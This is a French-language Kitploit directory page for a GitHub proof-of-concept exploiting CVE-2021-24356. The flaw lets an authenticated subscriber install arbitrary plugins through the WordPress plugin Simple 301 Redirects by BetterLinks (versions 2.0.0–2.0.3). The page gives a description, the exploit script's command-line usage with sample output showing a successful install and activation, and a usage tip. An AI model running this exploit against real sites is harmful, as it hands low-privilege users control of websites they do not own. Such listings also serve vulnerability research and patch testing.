Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-24356 — Simple 301 Redirects par BetterLinks - 2.0.0 – 2.0.3 - Abonné + Installation arbitraire de plugin | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2021-24356
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubrandomrobbiebf/cve-2021-24356

CVE-2021-24356

Simple 301 Redirects par BetterLinks - 2.0.0 – 2.0.3 - Abonné + Installation arbitraire de plugin

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-24356

Simple 301 Redirects par BetterLinks - 2.0.0 – 2.0.3 - Abonné + Installation arbitraire de plugin

Description

Un manque de vérifications de capacités et une vérification insuffisante du nonce sur l'action AJAX dans le plugin ont permis à des utilisateurs authentifiés d'installer des plugins arbitraires sur des sites vulnérables.

Comment utiliser

root@kitploit:~
$ python3 CVE-2021-24356.py --url http://wordpress.lan --username user --password useruser1 --slug betterlinks
Getting REST API Nonce!
Nonce Found: dd72f43027
Installing Plugin!
{"success":true,"data":"Plugin is installed successfully!"}
Activating Plugin!
{"success":true,"data":"BetterLinks is activated!"}

Remarque : Certains plugins peuvent ne pas s'activer si vous ne modifiez pas la variable sluga pour qu'elle corresponde au chemin/fichier.php qui est le fichier principal du plugin. Actuellement, cela fonctionne très bien lorsque le slug est quelque chose comme betterlinks et que le fichier principal du plugin s'appelle betterlinks.php.

Télécharger l’outil